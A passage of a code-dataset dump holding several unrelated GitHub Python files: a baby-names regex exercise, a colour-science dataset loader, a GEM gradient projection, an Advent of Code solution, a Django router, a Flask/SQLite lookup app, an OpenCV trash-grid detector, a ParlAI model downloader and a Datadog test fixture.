+{"seq_id":"21474982280","text":"#!/usr/bin/python\r\n# Copyright 2010 Google Inc.\r\n# Licensed under the Apache License, Version 2.0\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n\r\nimport sys\r\nimport re\r\n#from bs4 import BeautifulSoup\r\nimport codecs\r\n\r\n\"\"\"Baby Names exercise\r\nDefine the extract_names() function below and change main()\r\nto call it.\r\nFor writing regex, it's nice to include a copy of the target\r\ntext for inspiration.\r\nHere's what the html looks like in the baby.html files:\r\n...\r\n<h3 align=\"center\">Popularity in 1990</h3>\r\n....\r\n<tr align=\"right\"><td>1</td><td>Michael</td><td>Jessica</td>\r\n<tr align=\"right\"><td>2</td><td>Christopher</td><td>Ashley</td>\r\n<tr align=\"right\"><td>3</td><td>Matthew</td><td>Brittany</td>\r\n...\r\nSuggested milestones for incremental development:\r\n -Extract the year and print it\r\n -Extract the names and rank numbers and just print them\r\n -Get the names data into a dict and print it\r\n -Build the [year, 'name rank', ... ] list and print it\r\n -Fix main() to use the extract_names list\r\n\"\"\"\r\n\r\n\r\ndef extract_names(filename):\r\n    \"\"\"\r\n    Given a file name for baby.html, returns a list starting with the year string\r\n    followed by the name-rank strings in alphabetical order.\r\n    ['2006', 'Aaliyah 91', 'Aaron 57', 'Abagail 895', ' ...]\r\n    \"\"\"\r\n    # +++your code here+++\r\n    \"\"\"\r\n    file = codecs.open(filename, \"r\", \"utf-8\")\r\n    content = BeautifulSoup(file.read(),'lxml')\r\n    table = content.find('h3')\r\n    year = re.findall(r'\\d+',str(table))\r\n    \r\n    baby_names = []\r\n    baby_names.append(year[1])\r\n    \r\n    data = content.find_all('tr',align='right')\r\n    \"\"\"\r\n\r\n    baby_names = []\r\n    year = 0\r\n    with open(filename,'r') as infile:\r\n        data = infile.readlines()\r\n        #print(data)\r\n    for i in data:\r\n        tag = \"h3\"\r\n        names = r\"<\" + tag + \" align=\\\"center\\\">(.*?)</\" + tag + \">\"\r\n        table = re.findall(names,i)\r\n        if table:\r\n            year = re.findall(r'\\d+', str(table))\r\n            #print(year)\r\n            break\r\n\r\n    baby_names.append(year[0])\r\n    for i in data:\r\n        tag = \"td\"\r\n        names = r\"<\" + tag + \">(.*?)</\" + tag + \">\"\r\n        name_l = re.findall(names, i)\r\n        if name_l:\r\n            baby_names.append(name_l[1]+' '+name_l[0])\r\n            baby_names.append(name_l[2] + ' ' + name_l[0])\r\n    print(baby_names[0])\r\n    print()\r\n    print()\r\n    #for i in sorted(baby_names[1:]):\r\n        #print(i)\r\n\r\n    return baby_names\r\n\r\n\r\ndef main():\r\n    # This command-line parsing code is provided.\r\n    # Make a list of command line arguments, omitting the [0] element\r\n    # which is the script itself.\r\n    args = sys.argv[1:]\r\n\r\n    if not args:\r\n        print('usage: [--summaryfile] file [file ...]')\r\n        sys.exit(1)\r\n\r\n    # Notice the summary flag and remove it from args if it is present.\r\n    summary = False\r\n    if args[0] == '--summaryfile':\r\n        summary = True\r\n        del args[0]\r\n    f = sys.argv[2]\r\n    file = open(\"summaryfile.txt\",\"w+\")\r\n\r\n    b = extract_names(f)\r\n    # +++your code here+++\r\n    # For each filename, get the names, then either print the text output\r\n    # or write it to a summary file\r\n    file.write(b[0])\r\n    file.write(\"\\n\\n\")\r\n    for i in sorted(b[1:]):\r\n        file.write(i)\r\n        file.write(\"\\n\")\r\n\r\nif __name__ == '__main__':\r\n    main()","repo_name":"sethulakshmi03/task2","sub_path":"baby_names/babynames.py","file_name":"babynames.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"71023733391","text":"\"\"\"\nObserver Function Database - Asano (2015)\n=========================================\n\nDefines the objects implementing support for *Asano (2015)* *Observer Function\nDatabase* dataset loading:\n\n- :class:`colour_datasets.loaders.DatasetLoader_Asano2015`\n- :func:`colour_datasets.loaders.build_Asano2015`\n\nReferences\n----------\n- :cite:`Asano2015` : Asano, Y. (2015). Individual Colorimetric Observers for\n    Personalized Color Imaging. 
R.I.T.\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nfrom collections import namedtuple\n\nimport numpy as np\nimport xlrd\nfrom colour import SpectralShape\nfrom colour.colorimetry import (\n LMS_ConeFundamentals,\n XYZ_ColourMatchingFunctions,\n)\nfrom colour.hints import Dict, NDArrayFloat\nfrom colour.utilities import as_float_array, tstack\n\nfrom colour_datasets.loaders import AbstractDatasetLoader\nfrom colour_datasets.records import datasets\nfrom colour_datasets.utilities import cell_range_values, index_to_column\n\n__author__ = \"Colour Developers\"\n__copyright__ = \"Copyright 2019 Colour Developers\"\n__license__ = \"BSD-3-Clause - https://opensource.org/licenses/BSD-3-Clause\"\n__maintainer__ = \"Colour Developers\"\n__email__ = \"colour-developers@colour-science.org\"\n__status__ = \"Production\"\n\n__all__ = [\n \"Specification_Asano2015\",\n \"DatasetLoader_Asano2015\",\n \"build_Asano2015\",\n]\n\n\nclass Specification_Asano2015(\n namedtuple(\n \"Specification_Asano2015\",\n (\"XYZ_2\", \"XYZ_10\", \"LMS_2\", \"LMS_10\", \"parameters\", \"others\"),\n )\n):\n \"\"\"\n Define the *Asano (2015)* specification for an observer.\n\n Parameters\n ----------\n XYZ_2\n *CIE XYZ* 2 degree colour matching functions.\n XYZ_10\n *CIE XYZ* 10 degree colour matching functions.\n LMS_2\n *LMS* 2 degree cone fundamentals.\n LMS_10\n *LMS* 10 degree cone fundamentals.\n parameters\n Observer parameters.\n others\n Other information.\n\n References\n ----------\n :cite:`Asano2015`\n \"\"\" # noqa: D405, D407, D410, D411\n\n def __new__(\n cls,\n XYZ_2: XYZ_ColourMatchingFunctions,\n XYZ_10: XYZ_ColourMatchingFunctions,\n LMS_2: LMS_ConeFundamentals,\n LMS_10: LMS_ConeFundamentals,\n parameters: NDArrayFloat,\n others: Dict | None = None,\n ):\n \"\"\"\n Return a new instance of the\n :class:`colour_datasets.loaders.asano2015.Specification_Asano2015`\n class.\n \"\"\"\n\n return super().__new__(\n cls, XYZ_2, XYZ_10, LMS_2, LMS_10, parameters, others\n )\n\n\nclass DatasetLoader_Asano2015(AbstractDatasetLoader):\n \"\"\"\n Define the *Asano (2015)* *Observer Function Database* dataset loader.\n\n Attributes\n ----------\n - :attr:`colour_datasets.loaders.DatasetLoader_Asano2015.ID`\n\n Methods\n -------\n - :meth:`colour_datasets.loaders.DatasetLoader_Asano2015.__init__`\n - :meth:`colour_datasets.loaders.DatasetLoader_Asano2015.load`\n - :meth:`colour_datasets.loaders.DatasetLoader_Asano2015.\\\nparse_workbook_Asano2015`\n\n References\n ----------\n :cite:`Asano2015`\n \"\"\"\n\n ID: str = \"3252742\"\n \"\"\"Dataset record id, i.e. the *Zenodo* record number.\"\"\"\n\n def __init__(self) -> None:\n super().__init__(datasets()[DatasetLoader_Asano2015.ID])\n\n def load(self) -> Dict[str, Dict[int, Specification_Asano2015]]:\n \"\"\"\n Sync, parse, convert and return the *Asano (2015)*\n *Observer Function Database* dataset content.\n\n Returns\n -------\n :class:`dict`\n *Asano (2015)* *Observer Function Database* dataset content.\n\n Examples\n --------\n >>> from colour_datasets.utilities import suppress_stdout\n >>> dataset = DatasetLoader_Asano2015()\n >>> with suppress_stdout():\n ... dataset.load()\n ...\n >>> len(dataset.content.keys())\n 2\n \"\"\"\n\n super().sync()\n\n self._content = {\n \"Categorical Observers\": {},\n \"Colour Normal Observers\": {},\n }\n\n # Categorical Observers\n workbook_path = os.path.join(\n self.record.repository, \"dataset\", \"Data_10CatObs.xls\"\n )\n\n observers = (1, 10)\n template = \"Asano 2015 {0} Categorical Observer No. 
{1} {2}\"\n for index, observer in self.parse_workbook_Asano2015(\n workbook_path, template, observers\n ).items():\n self._content[\"Categorical Observers\"][\n index\n ] = Specification_Asano2015(\n observer[\"XYZ_2\"],\n observer[\"XYZ_10\"],\n observer[\"LMS_2\"],\n observer[\"LMS_10\"],\n observer[\"parameters\"],\n )\n\n # Colour Normal Observers\n workbook_path = os.path.join(\n self.record.repository, \"dataset\", \"Data_151Obs.xls\"\n )\n\n observers = (1, 151)\n\n # Other Information\n column_in, column_out = (\n index_to_column(observers[0] - 1),\n index_to_column(observers[1]),\n )\n workbook = xlrd.open_workbook(workbook_path)\n values_data = cell_range_values(\n workbook.sheet_by_index(5), f\"{column_in}2:{column_out}9\"\n )\n values_data.extend(\n cell_range_values(\n workbook.sheet_by_index(5), f\"{column_in}12:{column_out}16\"\n )\n )\n values_transposed = np.transpose(values_data)\n header, values = values_transposed[0], values_transposed[1:]\n\n template = \"Asano 2015 {0} Colour Normal Observer No. {1} {2}\"\n for i, (index, observer) in enumerate(\n self.parse_workbook_Asano2015(\n workbook_path, template, observers\n ).items()\n ):\n self._content[\"Colour Normal Observers\"][\n index\n ] = Specification_Asano2015(\n observer[\"XYZ_2\"],\n observer[\"XYZ_10\"],\n observer[\"LMS_2\"],\n observer[\"LMS_10\"],\n observer[\"parameters\"],\n dict(zip(header, values[i])),\n )\n\n return self._content\n\n @staticmethod\n def parse_workbook_Asano2015(\n workbook: str, template: str, observers: tuple = (1, 10)\n ) -> Dict[str, Dict]:\n \"\"\"\n Parse given *Asano (2015)* *Observer Function Database* workbook.\n\n Parameters\n ----------\n workbook\n *Asano (2015)* *Observer Function Database* workbook path.\n template\n Template used to create the *CMFS* names.\n observers\n Observers range.\n\n Returns\n -------\n :class:`dict`\n *Asano (2015)* *Observer Function Database* workbook observer data.\n \"\"\"\n\n book = xlrd.open_workbook(workbook)\n\n # \"CIE XYZ\" and \"LMS\" CMFS.\n column_in, column_out = (\n index_to_column(observers[0] + 1),\n index_to_column(observers[1] + 1),\n )\n\n shape = SpectralShape(390, 780, 5)\n wavelengths = shape.range()\n data: Dict = {}\n\n for i, cmfs in enumerate(\n [\n (XYZ_ColourMatchingFunctions, \"XYZ\"),\n (LMS_ConeFundamentals, \"LMS\"),\n ]\n ):\n for j, degree in enumerate(\n [(2, \"2$^\\\\circ$\"), (10, \"10$^\\\\circ$\")]\n ):\n sheet = book.sheet_by_index(j + (i * 2))\n\n x = np.transpose(\n cell_range_values(sheet, f\"{column_in}3:{column_out}81\")\n )\n y = np.transpose(\n cell_range_values(sheet, f\"{column_in}82:{column_out}160\")\n )\n z = np.transpose(\n cell_range_values(sheet, f\"{column_in}161:{column_out}239\")\n )\n\n for k in range(observers[1]):\n observer = k + 1\n rgb = tstack([x[k], y[k], z[k]])\n if data.get(observer) is None:\n data[observer] = {}\n\n key = f\"{cmfs[1]}_{degree[0]}\"\n data[observer][key] = cmfs[0](\n rgb,\n domain=wavelengths,\n name=template.format(degree[0], observer, cmfs[1]),\n display_name=template.format(\n degree[0], observer, cmfs[1]\n ),\n )\n\n # Parameters\n column_in, column_out = (\n index_to_column(observers[0] - 1),\n index_to_column(observers[1]),\n )\n\n values = np.transpose(\n cell_range_values(\n book.sheet_by_index(4), f\"{column_in}2:{column_out}10\"\n )\n )\n header, values = values[0], values[1:]\n\n for i in range(observers[1]):\n observer = i + 1\n data[observer][\"parameters\"] = dict(\n zip(header, as_float_array(values[i]))\n )\n\n return 
data\n\n\n_DATASET_LOADER_ASANO2015: DatasetLoader_Asano2015 | None = None\n\"\"\"\nSingleton instance of the *Asano (2015)* *Observer Function Database* dataset\nloader.\n\"\"\"\n\n\ndef build_Asano2015(load: bool = True) -> DatasetLoader_Asano2015:\n    \"\"\"\n    Singleton factory that builds the *Asano (2015)*\n    *Observer Function Database* dataset loader.\n\n    Parameters\n    ----------\n    load\n        Whether to load the dataset upon instantiation.\n\n    Returns\n    -------\n    :class:`colour_datasets.loaders.DatasetLoader_Asano2015`\n        Singleton instance of the *Asano (2015)* *Observer Function Database*\n        dataset loader.\n\n    References\n    ----------\n    :cite:`Asano2015`\n    \"\"\"\n\n    global _DATASET_LOADER_ASANO2015  # noqa: PLW0603\n\n    if _DATASET_LOADER_ASANO2015 is None:\n        _DATASET_LOADER_ASANO2015 = DatasetLoader_Asano2015()\n        if load:\n            _DATASET_LOADER_ASANO2015.load()\n\n    return _DATASET_LOADER_ASANO2015\n","repo_name":"colour-science/colour-datasets","sub_path":"colour_datasets/loaders/asano2015.py","file_name":"asano2015.py","file_ext":"py","file_size_in_byte":10008,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"83"}
+{"seq_id":"27034195621","text":"import torch\nfrom qpth.qp import QPFunction\n\ndef project2cone2(gradient, memories, margin=0.5, eps=1e-3):\n    \"\"\"\n        Solves the GEM dual QP described in the paper given a proposed\n        gradient \"gradient\", and a memory of task gradients \"memories\".\n        Overwrites \"gradient\" with the final projected update.\n        input:  gradient, p-vector\n        input:  memories, (t * p)-vector\n        output: x, p-vector\n    \"\"\"\n    with torch.no_grad():\n        t = memories.shape[0]\n        _eye = torch.eye(t, device=gradient.device)\n        G = -_eye\n        h = torch.zeros(t, device=gradient.device) - margin\n        \n        while True:\n            try:\n                Q = memories @ memories.t()\n                Q = (0.5 * (Q + Q.t()) + _eye * eps)\n                p = (memories @ gradient)\n                v = QPFunction(verbose=False)(Q, p, G, h, torch.zeros(0, device=gradient.device), torch.zeros(0, device=gradient.device))[0]\n                break\n            except:\n                eps = eps * 10.\n        \n        x = (v @ memories) + gradient\n        return x.detach()\n    ","repo_name":"ShinhwanKang/BeGin","sub_path":"begin/algorithms/gem/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"83"}
+{"seq_id":"11536715488","text":"# aoc_template.py\n\nimport pathlib\nimport sys\nfrom aocd.models import Puzzle\n\npuzzle = Puzzle(year=2022, day=10)\n\ndef parse(puzzle_input):\n    \"\"\"Parse input.\"\"\"\n    return [i.split(' ') for i in puzzle_input.split('\\n')]\n\ndef part1(data):\n    \"\"\"Solve part 1.\"\"\" \n    cycle = 1\n    register_X = 1\n\n    signal_strength = 0\n\n    for instr in data: \n        if instr[0] == 'noop':\n            cycle += 1\n        elif instr[0] == 'addx':\n            cycle += 1\n            if cycle % 40 == 20:\n                print(f\"cycle {cycle}, signal strength {cycle * register_X}\")\n                signal_strength += cycle * register_X\n            register_X += int(instr[1])\n            cycle += 1\n        else:\n            raise ValueError(f\"instruction is unknown: {instr[0]}\")\n    \n    if cycle % 40 == 20:\n        print(f\"cycle {cycle}, signal strength {cycle * register_X}\")\n        signal_strength += cycle * register_X\n    return signal_strength\n\ndef part2(data):\n    \"\"\"Solve part 2.\"\"\"\n    cycle = 0\n    register_X = 1\n\n    signal_strength = 0\n\n    screen = \"\"\n\n    for instr in data: \n        if instr[0] == 'noop':\n            if abs(cycle - register_X) < 2:\n                screen += '#'\n            else:\n                screen += '.'\n            cycle += 1\n            if cycle == 40:\n                screen += '\\n'\n                cycle = 0\n        elif instr[0] == 'addx':\n            for 
i in range(2):\n if abs(cycle - register_X) < 2:\n screen += '#'\n else:\n screen += '.'\n cycle += 1\n if cycle == 40:\n screen += '\\n'\n cycle = 0\n if i == 1:\n register_X += int(instr[1])\n else:\n raise ValueError(f\"instruction is unknown: {instr[0]}\")\n return screen\n\ndef solve(puzzle_input):\n \"\"\"Solve the puzzle for the given input.\"\"\"\n data = parse(puzzle_input) \n solution1 = part1(data)\n solution2 = part2(data)\n return solution1, solution2\n\nif __name__ == \"__main__\":\n \"\"\"Main function.\"\"\"\n # either input via a file given in argument or via aoc input plugin\n if len(sys.argv) > 1:\n for path in sys.argv[1:]:\n print(f\"{path}:\")\n puzzle_input = pathlib.Path(path).read_text().strip()\n else:\n puzzle_input = puzzle.input_data\n\n print(f\"input: \\n {puzzle_input[:50]}\")\n solutions = solve(puzzle_input)\n print(\"\\n\".join(str(solution) for solution in solutions))\n ","repo_name":"hadrienjeanne/adventofcode","sub_path":"202210_Cathode-Ray_Tube/aoc202210.py","file_name":"aoc202210.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10354500924","text":"from django.urls import path\nfrom .views import post_SignUp, get_RegisteredUsers, post_UserInfo, post_EditUser, index\n\n\napp_name = 'application'\nurlpatterns = [\n path('', index, name='index'),\n path('signup.html', post_SignUp, name='sign_up'),\n path('edit/', post_EditUser, name='edit'),\n path('register/', get_RegisteredUsers, name='register'),\n path('info/', post_UserInfo, name='info'),\n]\n","repo_name":"FatemehMomeni/ADB_hw2","sub_path":"webApp/application/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37179866872","text":"import os\nimport sqlite3\nimport re\nfrom flask import request\n#from flask import g\nfrom flask import Flask\nfrom flask import render_template\n\napp = Flask(__name__)\ndb_path = os.path.dirname(__file__) + '/arctic.db'\n\ndef sql_execute(sql, conn=None, as_dictionary=False):\n if not conn:\n try:\n conn = sqlite3.connect(db_path)\n except sqlite3.Error:\n return\n try:\n cur = conn.cursor()\n cur.execute(sql)\n if as_dictionary:\n cols = [i[0] for i in cur.description]\n rows = [dict(zip(cols,row)) for row in cur]\n else:\n rows = cur.fetchall()\n finally:\n conn.close()\n return rows\n\n@app.route('/')\ndef index():\n result = sql_execute(\"select count(*) from Lore\")\n ct = list(result[0])[0]\n print(f'Total number of items is {ct}')\n return render_template(\"index.html\")\n\n@app.route('/get_lores')\ndef get_lores():\n text = request.args.get('keywords')\n spl = re.split(\"[\\.\\s]\", text.replace(\"'\", \"''\"))\n sql = \"select * from Lore where \" + \"object_name like '%\" + \"%' and object_name like '%\".join(spl)\n sql += \"%'\"\n\n results = sql_execute(sql, as_dictionary=True)\n\n results_string = \"\"\n result_count = 0\n for row in results:\n line = f'
<br>'\n        result_count+=1\n        line += f'Object {str(row[\"OBJECT_NAME\"])} <br>'\n\n        if row[\"ITEM_TYPE\"] is not None:\n            line += f'Item Type: {str(row[\"ITEM_TYPE\"])}<br>'\n        if row[\"MAT_CLASS\"] is not None and row[\"MATERIAL\"] is not None:\n            line += f'Mat Class: {str(row[\"MAT_CLASS\"]):<10} Material: {str(row[\"MATERIAL\"])}<br>'\n        if row[\"WEIGHT\"] is not None and row[\"ITEM_VALUE\"] is not None:\n            line += f'Weight   : {str(row[\"WEIGHT\"]):<10} Value    : {str(row[\"ITEM_VALUE\"])}<br>'\n        if row[\"CAPACITY\"] is not None:\n            line += f'Capacity : {str(row[\"CAPACITY\"])}<br>'\n        if row[\"AFFECTS\"] is not None:\n            for affect in re.split(\",\", row[\"AFFECTS\"]):\n                line += f'Affects  : {str(affect.strip())}<br>'\n        if row[\"EFFECTS\"] is not None:\n            for effect in re.split(\",\", row[\"EFFECTS\"]):\n                line += f'Effects  : {str(effect.strip())}<br>'\n        if row[\"ITEM_IS\"] is not None:\n            line += f'Item is  : '\n            for item_is in re.split(\" \", row[\"ITEM_IS\"]):\n                line += f'{item_is} '\n            line += f'<br>'\n        if row[\"CHARGES\"] is not None:\n            line += f'Charges  : {str(row[\"CHARGES\"])}<br>'\n        if row[\"ITEM_LEVEL\"] is not None:\n            line += f'Level    : {row[\"ITEM_LEVEL\"]}<br>'\n        if row[\"APPLY\"] is not None:\n            line += f'Apply    : {str(row[\"APPLY\"])}<br>'\n        if row[\"RESTRICTS\"] is not None:\n            line += f'Restricts: '\n            for restrition in re.split(\" \", row[\"RESTRICTS\"]):\n                line += f'!{restrition} '\n            line += f'<br>'\n        if row[\"CLASS\"] is not None:\n            line += f'Class    : {row[\"CLASS\"]}<br>'\n        if row[\"IMMUNE\"] is not None:\n            line += f'Immune   : '\n            for immunity in re.split(\" \", row[\"IMMUNE\"]):\n                line += f'{immunity} '\n            line += f'<br>'\n        if row[\"DAMAGE\"] is not None:\n            line += f'Damage   : {str(row[\"DAMAGE\"])}<br>'\n        line += \"<br>***************<br>\"\n\n        results_string += line + \"<br>\"\n\n    return results_string\n","repo_name":"young24601/arctic_lore","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"35997334803","text":"import numpy as np \nimport cv2\nfrom imutils.video import VideoStream\nimport sys\nfrom math import sqrt\n\nfilename = 'C:/Users/User/Rover-Trasher/image/1.jpg'\ncorners = []\nwhile True:\n    vs = VideoStream(0)\n    img = vs.read()\n    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV )\n    hsv_min = np.array((9, 62, 170), np.uint8)\n    hsv_max = np.array((23, 101, 255), np.uint8)\n    img = cv2.inRange(hsv, hsv_min, hsv_max)\n    cv2.imshow('result', img)\n\n    ch = cv2.waitKey(5)\n    if ch == 27:\n        cv2.imwrite(filename, img)\n        print(\"saved\")\n        break\n\n#img = cv2.imread(\"./image/1.jpg\")\ncorners = []\ndef coords_corner(x1, y1, x2, y2, i_left, i_right, j_left, j_right):\n    global img\n    for i in range(i_left, i_right):\n        for j in range(j_left, j_right):\n            if int(img[j][i][0]) == 255:\n                if i < x1 and j < y1:\n                    x1 = i\n                    y1 = j\n                elif i > x2 and j > y2:\n                    x2 = i\n                    y2 = j\n    corners.append((x1 + abs(x1 - x2), y1 + abs(y1 - y2)))\n    img = cv2.line(img, (x1,y1), (x2,y2), (255,0,0), 5)\n\nimg = cv2.imread(filename)\ncoords_corner(10000, 10000, 0, 0, 0, 320, 0, 240) # top left\ncoords_corner(10000, 10000, 0, 0, 320, 640, 0, 240) # top right\ncoords_corner(10000, 10000, 0, 0, 0, 320, 240, 480) # bottom left\ncoords_corner(10000, 10000, 0, 0, 320, 640, 240, 480) # bottom right\n#img = cv2.line(img, (corners[0][0], corners[0][1]), (corners[2][0], corners[2][1]), (0,0,255), 1)\n#img = cv2.line(img, (corners[1][0], corners[1][1]), (corners[3][0], corners[3][1]), (0,0,255), 1)\n\nimg = vs.read()\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV )\nhsv_min = np.array((35, 83, 76), np.uint8)\nhsv_max = np.array((90, 255, 255), np.uint8)\nimg = cv2.inRange(hsv, hsv_min, hsv_max)\ncv2.imwrite(filename, img)\nimg = cv2.imread(filename)\n\n\n\n\nw, h = (4, 5) # i, j\npoints = []\nline_up = abs(corners[0][0] - corners[1][0]) // w\nline_down = abs(corners[2][0] - corners[3][0]) // w\ny_lines = [corners[0][1]]\nx_up = [corners[0][0] + line_up * i for i in range(w + 1)]\nx_down = [corners[2][0] + line_down * i for i in range(w + 1)]\npoints.append(x_up)\nfor i in range(w + 1):\n    img = cv2.line(img, (x_up[i], corners[0][1]), (x_down[i], corners[2][1]), (0,0,255), 1)\n    #f.write(\" \".join(map(str, x_center)) + \"\\n\")\nage = 20\nage_dict = {0: 30, 1: 45, 2: 45, 3: 50}\nfor i in range(h - 1):\n    a = []\n    for j in range(w + 1):\n        Rab = sqrt((x_down[j] - x_up[j]) ** 2 + (corners[2][1] - corners[0][1]) ** 2)\n        k = age / Rab\n        Xc = int(x_up[j] + (x_down[j] - x_up[j]) * k)\n        a.append(Xc)\n        Yc = int(corners[0][1] + (corners[2][1] - corners[0][1]) * k)\n    points.append(a)\n    y_lines.append(Yc)\n    age += age_dict[i] ############################ calibrate the length value\n    img = cv2.line(img, (a[0], Yc), (a[-1], Yc), (0,0,255), 1)\n\ncv2.imshow(\"image\", img)\npole = img\ncv2.waitKey(0)\ncv2.destroyAllWindows()\npoints.append(x_down)\ny_lines.append(corners[3][1])\ny_lines = sorted(list(set(y_lines)))\nprint(*points, sep=\"\\n\")\nprint(y_lines, 'Y')\nwhile True:\n    img2 = pole[:]\n    vs = VideoStream(0)\n    img = vs.read()\n    cv2.imwrite(filename, img)\n    img = cv2.imread(filename)\n    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV )\n    hsv_min = np.array((35, 83, 76), np.uint8)\n    hsv_max = np.array((90, 255, 255), np.uint8)\n    img = cv2.inRange(hsv, hsv_min, hsv_max)\n    for i in 
range(w + 1):\n        for j in range(h - 1):\n            print(i, j)\n            x1 = points[i][j]\n            x2 = points[i + 1][j + 1]\n            sqr = img\n            print(x1, x2, y_lines[i], y_lines[i + 1])\n            sqr = sqr[y_lines[i]:y_lines[i + 1], x1:x2]\n            sqr = cv2.resize(sqr, (32, 32))\n            #img2 = cv2.rectangle(img2, (x1, y_lines[i]), (x2, y_lines[i + 1]), (255, 255, 0), 2)\n            if sum(sum(sqr)) > 300:\n                print(\"Found trash in\", i, j)\n                img2 = cv2.rectangle(img2, (x1, y_lines[i]), (x2, y_lines[i + 1]), (0, 255, 0), 2)\n    #cv2.imshow(\"image\", sqr)\n    cv2.imshow(\"image\", img2)\n    while True:\n        ch = cv2.waitKey(5)\n        if ch == 27:\n            print(\"saved\")\n            break\n    \n    \n\n\n\n    \n","repo_name":"4-pm/SWTS-0.1","sub_path":"scearcher.py","file_name":"scearcher.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"34232842750","text":"import os\nimport json\nfrom pathlib import Path\n\nfrom typing import List, Union\n\nfrom parlai.core.message import Message\nfrom parlai.core.agents import create_agent\nimport parlai.core.build_data as build_data\n\nPROJECT_HOME = Path(__file__).parent.parent.resolve()\nDATA_DIR = os.path.join(PROJECT_HOME, 'data')\n\nCANARY_MODEL_FILE = [\n    build_data.DownloadableFile(\n        'https://storage.googleapis.com/ai2-mosaic-public/projects/prosocial-dialog/models/canary.tar.gz',\n        'canary.tar.gz',\n        '33d264e73c389726f193b448a878275b45a91954a95ef4be988a1fba75712d60',\n        zipped=True, from_google=False,\n    ),\n]\n\ndef download(datapath, version='v1.0'):\n    dpath = os.path.join(datapath, 'models', 'canary')\n\n    if not build_data.built(dpath, version):\n        print('[Downloading and building Canary: ' + dpath + ']')\n        if build_data.built(dpath):\n            # An older version exists, so remove these outdated files.\n            build_data.remove_dir(dpath)\n        build_data.make_dir(dpath)\n\n        # Download the data.\n        print(\"NOTE: Since Canary's size is 10GB, the download and extraction can take a long time.\")\n        for downloadable_file in CANARY_MODEL_FILE:\n            downloadable_file.download_file(dpath)\n\n        # Mark the data as built.\n        build_data.mark_done(dpath, version)\n\n    return dpath\n\nclass Canary(object):\n    def __init__(self):\n        canary_dir = download(DATA_DIR)\n        canary_meta_data = os.path.join(canary_dir, 'model.opt')\n        with open(canary_meta_data) as f:\n            opt = json.load(f)\n\n        opt['skip_generation'] = False\n        opt['model_file'] = os.path.join(canary_dir, 'model')\n        self.agent = create_agent(opt)\n\n    def chirp(self, input: Union[str, List]):\n        if isinstance(input, str):\n            input = [input]\n\n        return self.get_batch_output(input)\n    \n    def get_output(self, input: str):\n        return self.agent.respond(Message(text=input))\n\n    def get_batch_output(self, batch_input: List[str]):\n        message_batch = []\n        for input in batch_input:\n            message_batch.append(Message(text=input))\n\n        return self.agent.batch_respond(message_batch)\n    \n    def reset(self):\n        self.agent.reset()","repo_name":"skywalker023/prosocial-dialog","sub_path":"model/canary.py","file_name":"canary.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"83"}
+{"seq_id":"11068297715","text":"# (C) Datadog, Inc. 2023-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\n\nimport copy\nimport os\nfrom unittest import mock\n\nimport pytest\n\nfrom datadog_checks.dcgm import DcgmCheck\nfrom datadog_checks.dev import docker_run\nfrom datadog_checks.dev.conditions import CheckDockerLogs, CheckEndpoints\n\nfrom . 
import common\n\n\n@pytest.fixture(scope='session')\ndef dd_environment():\n    compose_file = common.COMPOSE_FILE\n    conditions = [\n        CheckDockerLogs(identifier='caddy', patterns=['server running']),\n        CheckEndpoints(common.INSTANCE[\"openmetrics_endpoint\"]),\n    ]\n    with docker_run(compose_file, conditions=conditions):\n        yield {\n            'instances': [common.INSTANCE],\n        }\n\n\n# For E2E and Unit testing:\n@pytest.fixture\ndef instance():\n    return copy.deepcopy(common.INSTANCE)\n\n\n# For Unit Test:\n@pytest.fixture\ndef check(instance):\n    return DcgmCheck('dcgm.', {}, [instance])\n\n\n@pytest.fixture()\ndef mock_metrics():\n    f_name = os.path.join(os.path.dirname(__file__), 'fixtures', 'metrics.txt')\n    with open(f_name, 'r') as f:\n        text_data = f.read()\n    with mock.patch(\n        'requests.get',\n        return_value=mock.MagicMock(\n            status_code=200, iter_lines=lambda **kwargs: text_data.split(\"\\n\"), headers={'Content-Type': \"text/plain\"}\n        ),\n    ):\n        yield\n","repo_name":"DataDog/integrations-core","sub_path":"dcgm/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","stars":820,"dataset":"github-code","pt":"83"}
+{"seq_id":"26795180963","text":"from random import randint\nfin = open(\"c.txt\")\nfout = open(\"output.txt\", \"w\")\n\ninpKeys = list(map(int, fin.readline().rstrip('\\n').split()))\nstreetTime = {}\nstreetIntersections = {}\ncarPath = []\npathExist = {}\nstreetCount = {}\nfor i in range(inpKeys[2]):\n    streetLine = list(fin.readline().rstrip('\\n').split())\n    streetIntersections[streetLine[2]] = [int(streetLine[0]), int(streetLine[1])]\n    streetTime[streetLine[2]] = streetLine[3]\nfor i in range(inpKeys[3]):\n    carLine = list(fin.readline().rstrip('\\n').split())\n    for i in range(1, len(carLine)):\n        if(carLine[i] in streetCount):\n            streetCount[carLine[i]]+=1\n        else:\n            streetCount[carLine[i]] = 1\n        pathExist[carLine[i]] = True\n    carPath.append(carLine)\n\nans = 0\ndone = []\nfor i in pathExist:\n    if(streetIntersections[i][1] not in done):\n        ans+=1\n        done.append(streetIntersections[i][1])\n\n\nfout.write(str(ans) + 